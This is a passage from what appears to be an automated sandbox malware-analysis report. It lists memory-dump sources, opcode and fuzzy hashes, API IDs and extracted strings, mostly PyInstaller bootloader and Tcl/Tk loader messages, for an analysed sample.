                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e5c34987f7a9ca6c6679c1ebbd58ec90466e7178802fc144f73f7d44e403847
                                                            • Instruction ID: 925e8fd89494a9a2d710e65204f4ec7ceaf27f170413857153f939fbcdafc1cb
                                                            • Opcode Fuzzy Hash: 0e5c34987f7a9ca6c6679c1ebbd58ec90466e7178802fc144f73f7d44e403847
                                                            • Instruction Fuzzy Hash: 8B810572E0C28A46E774DB1DA44976AA791FBA7798FA04235DB8D07B8DCE7CD0008B10
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c34368459bdf7368baf31263ac24a190fc159f540f31ab2486b56688e89a89bf
                                                            • Instruction ID: 83391d8f91d8077e0c99a5c13164a667fdbaabc7268e0c157638f2d5446d4cb1
                                                            • Opcode Fuzzy Hash: c34368459bdf7368baf31263ac24a190fc159f540f31ab2486b56688e89a89bf
                                                            • Instruction Fuzzy Hash: D0610A22F1C29646F764B92CB444339EA81AF62368F960235D71D43BC9EEFDE8108730
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                            • Instruction ID: f4dd5911d5b0a7c4b4649d9300870dc22db3d83a023ed135cb8b28fa1a9f0beb
                                                            • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                            • Instruction Fuzzy Hash: 4351B532E1865982E7259B2CE058678B3A0EB6AB5CF754131CF4D47798CBBAE843C750
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                            • Instruction ID: 5a4ed7d885fe589f661573bab0bb4d2e69e8de7bd8d297ab0f2a02e6ea5b38aa
                                                            • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                            • Instruction Fuzzy Hash: 4151A436E1865986E7269B2CE048238B3A1EB66B5CF744131CF4D0779CCBBAE843C750
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                            • Instruction ID: 83c42f4a2918154b224eba0d2f11c3a8c9ebe3f91d6f7126c9c6837708a791e4
                                                            • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                            • Instruction Fuzzy Hash: 7051E936E1866986E7259B2CE048238B3A0EB66B9CF744131DF4D07798DF7AE843C750
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                            • Instruction ID: c3f1868af9017abb58a81746882e8ef82ec6895186d0f1dec648dd4db68c9073
                                                            • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                            • Instruction Fuzzy Hash: EF51B532E1865581E7269B2DE048238B3A0EB6AB5CFB54131CF4C5779CCB7AE842C750
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                            • Instruction ID: 1fbc186ce9145f6ba9ffe1c88a9db1d4d8e6ad7d8e22e019c178e0373480ebcc
                                                            • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                            • Instruction Fuzzy Hash: 74518D36E18669C2E7259B2DE04822CA3A1EB66B5CFB44135CB4C07798CB7EEC43C750
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                            • Instruction ID: d3dba95e729d76422a9c08eae7991f0fe518513f09ba8517fb47e5cd868b1447
                                                            • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                            • Instruction Fuzzy Hash: 1851E836E18A5581E7259B2DD458238B7A0EB66B5CFB44031CF4C177ACCF7AE842C750
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                            • Instruction ID: 70fb20ca985928b690e25e5649b045f8f63ae1396c967f892cef9560b70f87fa
                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                            • Instruction Fuzzy Hash: D1419362C0974E04EF95991C29087B8A781DF73BE8DB852B0DF99133CEDD4E6996C220
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: a584b5ebd410868caf684851e7ae72ca0a48fe722538065b11fe9c603729eb0f
                                                            • Instruction ID: c589d36dad4d412a495908ee390ad39a73067a0fe37a8918ba3f0d17900afd25
                                                            • Opcode Fuzzy Hash: a584b5ebd410868caf684851e7ae72ca0a48fe722538065b11fe9c603729eb0f
                                                            • Instruction Fuzzy Hash: DC410562B14A5982EF04DF6EE924569B3A2FB59FC4B999032DF0D97B58DE7CD0418300
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                            • Instruction ID: 1b2a08918c3d485887609f5fad1db86e5605e7c9eeaaf1f8e919d9f980daf4b7
                                                            • Opcode Fuzzy Hash: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                            • Instruction Fuzzy Hash: 6D31E432E1CB4581E764AB29744412DF794EBC6B94F644238EB8957BDACF7CD0128314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aa2e9ba6296ea42dd861dc7f4a70719f263379b300c18e22927abb196144ca8
                                                            • Instruction ID: 16906d87a13e59a90dad3b938d71dec8aa51ffbec54d1eb7719812d9c4e1b74c
                                                            • Opcode Fuzzy Hash: 4aa2e9ba6296ea42dd861dc7f4a70719f263379b300c18e22927abb196144ca8
                                                            • Instruction Fuzzy Hash: 99F06871B182999ADB98AF2DB402629BBD0F719384F808439D68D87B0CD67C90608F14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba86f607178f2dc3ef803bbc4180c5da227c40ec501de79dfe2d660df2792ade
                                                            • Instruction ID: 6d1ec70d68ad048c5be37f6c7b36de5cdbace253236d49ebd3439c5c7d6737d4
                                                            • Opcode Fuzzy Hash: ba86f607178f2dc3ef803bbc4180c5da227c40ec501de79dfe2d660df2792ade
                                                            • Instruction Fuzzy Hash: A2A00121988816E4E745AB0DA992520A360AB62319FC10032D60E810A89FACA551C620
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                            • API String ID: 190572456-2208601799
                                                            • Opcode ID: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                            • Instruction ID: e4bef52dadfbbf9545d63edc97f1b2f004eb64cc39f745774ab8aec41f84a601
                                                            • Opcode Fuzzy Hash: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                            • Instruction Fuzzy Hash: FDE1FA65A0EB0B90FB56EB4CB891174E3A1AF2775CFC55531CA0D0669CEFFCB1688260
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message_fread_nolock
                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                            • API String ID: 3065259568-2316137593
                                                            • Opcode ID: 158d00d3fa35f6ec523f5cd77b2a764e4e84d15d3d6112a4d59896a6fa0a4bdf
                                                            • Instruction ID: 068335375ba56057879f6bb82f8d15a12f9e86b57d1fdf9cadbc1cfe1826ab00
                                                            • Opcode Fuzzy Hash: 158d00d3fa35f6ec523f5cd77b2a764e4e84d15d3d6112a4d59896a6fa0a4bdf
                                                            • Instruction Fuzzy Hash: DE519321A0868785EB20B719A8922FAE354EF667DCFD04031EF4D47A8DEEBCF5418750
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                            • String ID: P%
                                                            • API String ID: 2147705588-2959514604
                                                            • Opcode ID: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                            • Instruction ID: 181a4a601d6284a66c23e37b7b80b482bf4417590cbbc03edbaab74f5f91607b
                                                            • Opcode Fuzzy Hash: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                            • Instruction Fuzzy Hash: 735119266187A186D734AF26F0582BAF7A1F7A9B65F004121EFCE43684DF7CD055DB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$:$f$p$p
                                                            • API String ID: 3215553584-2013873522
                                                            • Opcode ID: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                            • Instruction ID: 0941eb0079ba6d034186fc3ee93e9f4789cd7d939914e03fd557f03acaa42598
                                                            • Opcode Fuzzy Hash: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                            • Instruction Fuzzy Hash: 76129261E0C14B86FB20BA18F159679F752EB62758FE48135EBC9466C8DFBCE4808770
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$f$p$p$f
                                                            • API String ID: 3215553584-1325933183
                                                            • Opcode ID: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                            • Instruction ID: 1aba04873dcc2d6b74dc28074ad4cfa72bf9a00f4afea3e0f88efc8abd1202b4
                                                            • Opcode Fuzzy Hash: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                            • Instruction Fuzzy Hash: 5E127321E0C18BC5FB207A58F15C679B7A2FB62758FE44136E799465CCDBBCE5808B20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                            • API String ID: 2030045667-3659356012
                                                            • Opcode ID: a80852cf7a0435982f1b2a2e47e4ceb785ea7fc5e965373e9eced2b197ef6b24
                                                            • Instruction ID: 08d55de3c1c5554226fca1ed380403664d293adc82609c27838dd3e54702706e
                                                            • Opcode Fuzzy Hash: a80852cf7a0435982f1b2a2e47e4ceb785ea7fc5e965373e9eced2b197ef6b24
                                                            • Instruction Fuzzy Hash: B531B821B0864781EB24BB1AB4916BAE350EF267DCFD44431DF4D07A5DEEBCE5458710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
